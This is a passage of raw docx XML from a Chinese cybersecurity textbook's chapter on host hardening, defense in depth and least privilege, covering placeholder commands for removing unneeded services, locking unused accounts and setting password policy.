        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sanders, C. 《Practical Packet Analysis》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：虽然偏重数据包分析，但对于理解如何从网络流量中提取可关联的元数据，以及构建流量基线与异常检测，有重要的基础作用。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="337"/>
    <w:bookmarkEnd w:id="338"/>
    <w:bookmarkStart w:id="340" w:name="安全加固与纵深防御"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全加固与纵深防御</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="339" w:name="主机网络加固与最小权限"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机/网络加固与最小权限</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="339"/>
    <w:bookmarkEnd w:id="340"/>
    <w:bookmarkStart w:id="363" w:name="主机网络加固与最小权限-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机/网络加固与最小权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节的安全控制措施与检测逻辑直接映射到本教材卷一至卷四的各类攻击技术。读者需先掌握：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷四·第15章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本地提权（SUID、内核漏洞利用）与持久化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷三·第9–11章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入与文件上传</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷二·第5章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描与服务探测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ch26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子网与路由、Ch28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙/ACL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理——本书不复述子网划分与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置基础，只聚焦其在防御中的“爆炸半径限制”应用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一切加固措施的检验，均应在“Ch22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">capstone”完整杀伤链中看到对应防御点的阻截效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节中出现的所有基线配置命令、ACL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则示例、补丁管理流程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅限读者在自建隔离实验室、官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VulnHub/HTB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">受控节点）或经过书面授权的内部测试环境中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。加固清单绝不涉及任何生产系统；所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、端口、用户、路径均使用占位符，实际值因环境而异②。在未经授权的主机上执行加固变动可能导致业务中断，属违规行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御（Defense</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Depth）是现代安全架构的核心原则，其基本假设是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任何单一防御层都可能被突破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。基于该假设，安全控制应在主机、网络、应用、数据等多层布置独立的防护点，使得攻击者即便绕过某一层，也难以完成整个杀伤链，同时为蓝队争取检测与响应的时间。这一原则直接回应了本教材前四卷所有攻击技术的根本逻辑——攻击者总是在寻找被违反的安全假设：信任网络边界（ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗）、未过滤的输入（SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入）、宽松的文件权限（SUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权）、默认凭据（口令爆破）等。加固的使命，就是将所有这些被攻击者利用的“假设缺口”重新关上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在纵深防御体系中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预防（Prevent）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（Detect）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">响应（Respond）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三道防线缺一不可。本节聚焦于预防层的两个核心支柱：主机强化与网络分段，同时辅以最小权限原则和补丁管理。检测与响应的具体工程实现已在第19章详述，此处不再重复，但会在每条加固措施中强调其“使攻击留痕以利检测”的附带效益。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="345" w:name="主机加固最小化攻击面"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机加固：最小化攻击面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机加固的第一性原则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小化可用攻击面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：任何未安装的软件、未开启的服务、不存在的账户，都是攻击者无法利用的。这一思想与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800-123 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CIS Benchmarks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的基线理念完全一致——通过系统化的配置检查，将主机收敛到一个“只提供业务必需功能”的最小状态。由于基线配置的具体语法与操作系统、发行版版本强相关②，本节以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例给出占位示例，所有命令应在授权靶机上验证后再参考使用。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="341" w:name="移除无用服务与包"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">移除无用服务与包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者在侦察阶段（回指卷四第5章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描）常通过开放端口识别可攻击的服务。关闭不必要服务，直接阻断扫描结果中的“入口点”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">识别当前监听端口及对应服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tlnp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tlnp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②工具因发行版而异）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁用并移除无用服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：例如，若靶机是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，且不需邮件服务，则应彻底卸载</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exim/Postfix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MTA，而非仅停用。命令示例（②Debian/Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl stop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVICE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl disable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVICE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt purge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PACKAGE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御映射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果目标主机运行了无用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务（端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">23），攻击者可能利用其明文传输特性抓取口令（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch6 ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗结合流量嗅探），或直接尝试弱口令爆破。关闭该服务后，上述攻击路径直接被切断。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="341"/>
    <w:bookmarkStart w:id="342" w:name="账户与口令策略最小化"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户与口令策略最小化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱口令、默认账户、过多的登录账户是暴力破解（Brute-force）和凭证填充（Credential</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stuffing）攻击成功的关键。主机加固必须包含严格的账户清理与口令策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">删除或锁定非必要账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：特别是系统安装后遗留的默认游戏/打印/测试账户。例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> userdel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">UNUSED_ACCOUNT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> usermod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ACCOUNT_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 锁定账户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">强制强口令策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：编辑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/pam.d/common-password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/security/pwquality.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②路径因发行版而异），配置最小长度、历史口令数、复杂度级别等。此配置直接影响攻击者在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">辅助扫描模块（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch17）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra（Ch5）中暴力破解的成功率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">直接登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：禁止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
